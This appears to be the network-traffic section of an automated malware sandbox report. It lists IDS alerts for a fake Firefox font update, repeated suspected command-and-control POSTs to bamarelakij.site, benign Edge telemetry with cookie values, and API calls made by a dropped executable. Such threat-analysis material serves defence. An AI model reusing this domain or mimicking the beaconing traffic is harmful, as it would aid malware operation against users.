Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:50096 -> 104.21.80.52:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:50095 -> 104.21.80.52:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:50092 -> 104.21.80.52:443
Source: global trafficHTTP traffic detected: POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36Content-Length: 147Host: bamarelakij.site
Source: global trafficHTTP traffic detected: POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36p: 1V/P0mPQQSCTS08rUK676SzNB/ZpQ2o6hGfMU4k1Y8Y86gb2rF0ak7cf4BYAW0D4A9tKmQjRguuHContent-Length: 53Host: bamarelakij.site
Source: global trafficHTTP traffic detected: POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36p: 1V/P0mPQQSCTS08rUK676SzNB/ZpQ2o6hGfMU4k1Y8Y86gb2rF0ak7cf4BYAW0D4A9tKmQjRguuHContent-Length: 208Host: bamarelakij.site
Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1736430156624&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=b276648dc0624032bb79063018bd1f87&activityId=b276648dc0624032bb79063018bd1f87&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=0E823CD872A76198161729B773BE609A; _EDGE_S=F=1&SID=0C1F4AD11C6365C209785FBE1D6C642F; _EDGE_V=1
Source: global trafficHTTP traffic detected: GET /b?rn=1736430156624&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=0E823CD872A76198161729B773BE609A&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736430156622&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1Host: browser.events.data.msn.comConnection: keep-aliveContent-Length: 3856sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Content-Type: text/plain;charset=UTF-8Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=0E823CD872A76198161729B773BE609A; _EDGE_S=F=1&SID=0C1F4AD11C6365C209785FBE1D6C642F; _EDGE_V=1
Source: global trafficHTTP traffic detected: GET /b2?rn=1736430156624&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=0E823CD872A76198161729B773BE609A&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: UID=1C82b153708d47b4ae7d1c01736430158; XID=1C82b153708d47b4ae7d1c01736430158
Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1736430156624&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=b276648dc0624032bb79063018bd1f87&activityId=b276648dc0624032bb79063018bd1f87&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=DA9A15B01DA04E12909853D03F33D1E9&MUID=0E823CD872A76198161729B773BE609A HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=0E823CD872A76198161729B773BE609A; _EDGE_S=F=1&SID=0C1F4AD11C6365C209785FBE1D6C642F; _EDGE_V=1; SM=T; _C_ETH=1
Source: global trafficHTTP traffic detected: POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36Content-Length: 147Host: bamarelakij.site
Source: global trafficHTTP traffic detected: POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736430158575&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1Host: browser.events.data.msn.comConnection: keep-aliveContent-Length: 11483sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Content-Type: text/plain;charset=UTF-8Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=0E823CD872A76198161729B773BE609A; _EDGE_S=F=1&SID=0C1F4AD11C6365C209785FBE1D6C642F; _EDGE_V=1; msnup=
Source: global trafficHTTP traffic detected: POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736430158586&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1Host: browser.events.data.msn.comConnection: keep-aliveContent-Length: 33238sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Content-Type: text/plain;charset=UTF-8Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=0E823CD872A76198161729B773BE609A; _EDGE_S=F=1&SID=0C1F4AD11C6365C209785FBE1D6C642F; _EDGE_V=1; msnup=
Source: global trafficHTTP traffic detected: POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736430159327&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1Host: browser.events.data.msn.comConnection: keep-aliveContent-Length: 5379sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Content-Type: text/plain;charset=UTF-8Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=0E823CD872A76198161729B773BE609A; _EDGE_S=F=1&SID=0C1F4AD11C6365C209785FBE1D6C642F; _EDGE_V=1; msnup=; _C_ETH=1
Source: global trafficHTTP traffic detected: POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36p: 1V/P0mPQQSCTS08rUK676SzNB/ZpQ2o6hGfMU4k1Y8Y86gb2rF0ak7cf4BYAW0D4A9tKmQjRguuHContent-Length: 53Host: bamarelakij.site
Source: global trafficHTTP traffic detected: POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736430159570&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1Host: browser.events.data.msn.comConnection: keep-aliveContent-Length: 9880sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Content-Type: text/plain;charset=UTF-8Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=0E823CD872A76198161729B773BE609A; _EDGE_S=F=1&SID=0C1F4AD11C6365C209785FBE1D6C642F; _EDGE_V=1; msnup=; _C_ETH=1
Source: global trafficHTTP traffic detected: GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36p: 1V/P0mPQQSCTS08rUK676SzNB/ZpQ2o6hGfMU4k1Y8Y86gb2rF0ak7cf4BYAW0D4A9tKmQjRguuHContent-Length: 130028Host: bamarelakij.site
Source: global trafficHTTP traffic detected: POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36p: 1V/P0mPQQSCTS08rUK676SzNB/ZpQ2o6hGfMU4k1Y8Y86gb2rF0ak7cf4BYAW0D4A9tKmQjRguuHContent-Length: 745Host: bamarelakij.site
Source: global trafficHTTP traffic detected: POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36p: 1V/P0mPQQSCTS08rUK676SzNB/ZpQ2o6hGfMU4k1Y8Y86gb2rF0ak7cf4BYAW0D4A9tKmQjRguuHContent-Length: 212Host: bamarelakij.site
Source: global trafficHTTP traffic detected: POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36p: 1V/P0mPQQSCTS08rUK676SzNB/ZpQ2o6hGfMU4k1Y8Y86gb2rF0ak7cf4BYAW0D4A9tKmQjRguuHContent-Length: 380Host: bamarelakij.site
Source: global trafficHTTP traffic detected: POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36p: 1V/P0mPQQSCTS08rUK676SzNB/ZpQ2o6hGfMU4k1Y8Y86gb2rF0ak7cf4BYAW0D4A9tKmQjRguuHContent-Length: 9953Host: bamarelakij.site
Source: global trafficHTTP traffic detected: POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36p: 1V/P0mPQQSCTS08rUK676SzNB/ZpQ2o6hGfMU4k1Y8Y86gb2rF0ak7cf4BYAW0D4A9tKmQjRguuHContent-Length: 70050Host: bamarelakij.site
Source: global trafficHTTP traffic detected: POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36p: 1V/P0mPQQSCTS08rUK676SzNB/ZpQ2o6hGfMU4k1Y8Y86gb2rF0ak7cf4BYAW0D4A9tKmQjRguuHContent-Length: 35Host: bamarelakij.site
Source: global trafficHTTP traffic detected: POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36p: 1V/P0mPQQSCTS08rUK676SzNB/ZpQ2o6hGfMU4k1Y8Y86gb2rF0ak7cf4BYAW0D4A9tKmQjRguuHContent-Length: 132728Host: bamarelakij.site
Source: global trafficHTTP traffic detected: POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36p: 1V/P0mPQQSCTS08rUK676SzNB/ZpQ2o6hGfMU4k1Y8Y86gb2rF0ak7cf4BYAW0D4A9tKmQjRguuHContent-Length: 745Host: bamarelakij.site
Source: global trafficHTTP traffic detected: POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36p: 1V/P0mPQQSCTS08rUK676SzNB/ZpQ2o6hGfMU4k1Y8Y86gb2rF0ak7cf4BYAW0D4A9tKmQjRguuHContent-Length: 212Host: bamarelakij.site
Source: global trafficHTTP traffic detected: POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36p: 1V/P0mPQQSCTS08rUK676SzNB/ZpQ2o6hGfMU4k1Y8Y86gb2rF0ak7cf4BYAW0D4A9tKmQjRguuHContent-Length: 380Host: bamarelakij.site
Source: global trafficHTTP traffic detected: POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36p: 1V/P0mPQQSCTS08rUK676SzNB/ZpQ2o6hGfMU4k1Y8Y86gb2rF0ak7cf4BYAW0D4A9tKmQjRguuHContent-Length: 9953Host: bamarelakij.site
Source: global trafficHTTP traffic detected: POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36p: 1V/P0mPQQSCTS08rUK676SzNB/ZpQ2o6hGfMU4k1Y8Y86gb2rF0ak7cf4BYAW0D4A9tKmQjRguuHContent-Length: 70017Host: bamarelakij.site
Source: global trafficHTTP traffic detected: POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36p: 1V/P0mPQQSCTS08rUK676SzNB/ZpQ2o6hGfMU4k1Y8Y86gb2rF0ak7cf4BYAW0D4A9tKmQjRguuHContent-Length: 35Host: bamarelakij.site
Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknownTCP traffic detected without corresponding DNS query: 184.51.149.176
Source: unknownTCP traffic detected without corresponding DNS query: 184.51.149.176
Source: unknownTCP traffic detected without corresponding DNS query: 184.51.149.176
Source: unknownTCP traffic detected without corresponding DNS query: 184.51.149.176
Source: unknownTCP traffic detected without corresponding DNS query: 184.51.149.176
Source: unknownTCP traffic detected without corresponding DNS query: 184.51.149.176
Source: unknownTCP traffic detected without corresponding DNS query: 184.51.149.176
Source: unknownTCP traffic detected without corresponding DNS query: 184.51.149.176
Source: unknownTCP traffic detected without corresponding DNS query: 184.51.149.176
Source: unknownTCP traffic detected without corresponding DNS query: 184.51.149.176
Source: unknownTCP traffic detected without corresponding DNS query: 184.51.149.176
Source: unknownTCP traffic detected without corresponding DNS query: 184.51.149.176
Source: unknownTCP traffic detected without corresponding DNS query: 184.51.149.176
Source: unknownTCP traffic detected without corresponding DNS query: 40.79.167.8
Source: unknownTCP traffic detected without corresponding DNS query: 40.79.167.8
Source: unknownTCP traffic detected without corresponding DNS query: 40.79.167.8
Source: unknownTCP traffic detected without corresponding DNS query: 18.173.219.111
Source: unknownTCP traffic detected without corresponding DNS query: 18.173.219.111
Source: unknownTCP traffic detected without corresponding DNS query: 18.173.219.111
Source: unknownTCP traffic detected without corresponding DNS query: 184.51.149.176
Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknownTCP traffic detected without corresponding DNS query: 18.173.219.111
Source: unknownTCP traffic detected without corresponding DNS query: 18.173.219.111
Source: unknownTCP traffic detected without corresponding DNS query: 18.173.219.111
Source: unknownTCP traffic detected without corresponding DNS query: 18.173.219.111
Source: unknownTCP traffic detected without corresponding DNS query: 18.173.219.111
Source: unknownTCP traffic detected without corresponding DNS query: 18.173.219.111
Source: unknownTCP traffic detected without corresponding DNS query: 18.173.219.111
Source: unknownTCP traffic detected without corresponding DNS query: 18.173.219.111
Source: unknownTCP traffic detected without corresponding DNS query: 18.173.219.111
Source: unknownTCP traffic detected without corresponding DNS query: 18.173.219.111
Source: unknownTCP traffic detected without corresponding DNS query: 40.79.167.8
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exeCode function: 2_2_6D463DAF HttpQueryInfoW,HttpQueryInfoW,HttpQueryInfoW,GetLastError,_memmove,_memmove,InternetReadFile,2_2_6D463DAF
